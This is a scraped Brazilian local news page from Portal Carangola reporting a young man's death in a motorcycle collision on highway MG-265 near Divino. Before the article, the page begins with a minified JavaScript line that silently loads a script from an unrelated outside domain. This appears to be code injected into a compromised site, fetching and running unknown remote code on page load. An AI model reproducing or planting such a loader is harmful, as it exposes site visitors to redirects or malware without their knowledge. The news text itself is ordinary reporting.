;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jovem morre em acidente próximo a Divino. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Jovem morre em acidente próximo a Divino.

DIVINO (MG) – Na noite deste domingo, 15/01, um grave acidente foi registrado na MG-265, sentindo a BR-116, próximo a entrada do córrego dos Ferreiras em Divino.

De acordo com informações colhidas no local do acidente, o jovem identificado Caio Vitor de abreu, residente no município de Orizânia, estava em uma motocicleta, momento em que colidiu contra um veículo gol da cor preta, perdendo o controle da motocicleta e se chocando contra um veículo Nissan da cor branca.

Duas viaturas do SAMU estiveram no local, porém foi constatado que o jovem da motocicleta já estava sem vida. Os ocupantes dos veículos não sofreram ferimentos.

A Polícia Militar do município de Divino, compareceu ao local e realizou a sinalização do trânsito e resguardou o local até a chegada da Perícia Técnica de Muriaé.

Divino Notícias – Com Informações e Fotos Jornal o Impacto.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.